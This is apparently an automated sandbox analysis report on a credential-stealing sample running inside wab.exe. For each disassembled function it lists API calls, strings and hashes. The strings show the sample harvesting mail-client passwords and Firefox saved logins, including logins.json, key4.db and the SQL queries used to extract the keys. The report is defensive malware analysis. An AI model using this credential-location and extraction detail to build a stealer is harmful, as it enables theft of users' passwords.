                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                    Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                    Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: EnumNamesResource
                    • String ID:
                    • API String ID: 3334572018-0
                    • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                    • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                    • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                    • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                    Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                    Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                    Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                    Non-executed Functions

                    Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                    • API String ID: 2238633743-192783356
                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                    Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString_mbscmpstrlen
                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                    • API String ID: 3963849919-1658304561
                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                    Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID: (yE$(yE$(yE
                    • API String ID: 1865533344-362086290
                    • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                    • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                    Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                    • memset.MSVCRT ref: 0040E5B8
                    • memset.MSVCRT ref: 0040E5CD
                    • _mbscpy.MSVCRT ref: 0040E634
                    • _mbscpy.MSVCRT ref: 0040E64A
                    • _mbscpy.MSVCRT ref: 0040E660
                    • _mbscpy.MSVCRT ref: 0040E676
                    • _mbscpy.MSVCRT ref: 0040E68C
                    • _mbscpy.MSVCRT ref: 0040E69F
                    • memset.MSVCRT ref: 0040E6B5
                    • memset.MSVCRT ref: 0040E6CC
                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                      • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                    • memset.MSVCRT ref: 0040E736
                    • memset.MSVCRT ref: 0040E74F
                    • sprintf.MSVCRT ref: 0040E76D
                    • sprintf.MSVCRT ref: 0040E788
                    • _strcmpi.MSVCRT ref: 0040E79E
                    • _strcmpi.MSVCRT ref: 0040E7B7
                    • _strcmpi.MSVCRT ref: 0040E7D3
                    • memset.MSVCRT ref: 0040E858
                    • sprintf.MSVCRT ref: 0040E873
                    • _strcmpi.MSVCRT ref: 0040E889
                    • _strcmpi.MSVCRT ref: 0040E8A5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                    • API String ID: 4171719235-3943159138
                    • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                    • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                    Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                    • GetWindowRect.USER32(?,?), ref: 00410487
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                    • GetDC.USER32 ref: 004104E2
                    • strlen.MSVCRT ref: 00410522
                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                    • ReleaseDC.USER32(?,?), ref: 00410580
                    • sprintf.MSVCRT ref: 00410640
                    • SetWindowTextA.USER32(?,?), ref: 00410654
                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                    • GetClientRect.USER32(?,?), ref: 004106DD
                    • GetWindowRect.USER32(?,?), ref: 004106E7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                    • GetClientRect.USER32(?,?), ref: 00410737
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                    • String ID: %s:$EDIT$STATIC
                    • API String ID: 1703216249-3046471546
                    • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                    • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                    Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004024F5
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • _mbscpy.MSVCRT ref: 00402533
                    • _mbscpy.MSVCRT ref: 004025FD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$QueryValuememset
                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                    • API String ID: 168965057-606283353
                    • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                    • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                    Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00402869
                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                    • _mbscpy.MSVCRT ref: 004028A3
                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                    • _mbscpy.MSVCRT ref: 0040297B
                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                    • API String ID: 1497257669-167382505
                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                    Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                    • LoadCursorA.USER32(00000067), ref: 0040115F
                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                    • EndDialog.USER32(?,00000001), ref: 0040121A
                    • DeleteObject.GDI32(?), ref: 00401226
                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                    • ShowWindow.USER32(00000000), ref: 00401253
                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                    • ShowWindow.USER32(00000000), ref: 00401262
                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                    • memset.MSVCRT ref: 0040128E
                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                    • String ID:
                    • API String ID: 2998058495-0
                    • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                    • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                    Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                    • API String ID: 231171946-2189169393
                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                    Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscat$memsetsprintf$_mbscpy
                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                    • API String ID: 633282248-1996832678
                    • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                    • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                    Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • , xrefs: 00406834
                    • key4.db, xrefs: 00406756
                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memcmp$memsetstrlen
                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                    • API String ID: 3614188050-3983245814
                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                    Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: sprintf$memset$_mbscpy
                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                    • API String ID: 3402215030-3842416460
                    • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                    • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                    Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                      • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                      • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                      • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                      • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                    • strlen.MSVCRT ref: 0040F139
                    • strlen.MSVCRT ref: 0040F147
                    • memset.MSVCRT ref: 0040F187
                    • strlen.MSVCRT ref: 0040F196
                    • strlen.MSVCRT ref: 0040F1A4
                    • memset.MSVCRT ref: 0040F1EA
                    • strlen.MSVCRT ref: 0040F1F9
                    • strlen.MSVCRT ref: 0040F207
                    • _strcmpi.MSVCRT ref: 0040F2B2
                    • _mbscpy.MSVCRT ref: 0040F2CD
                    • _mbscpy.MSVCRT ref: 0040F30E
                      • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                    • String ID: logins.json$none$signons.sqlite$signons.txt
                    • API String ID: 1613542760-3138536805
                    • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                    • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                    Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                    • API String ID: 1012775001-1343505058
                    • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                    • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
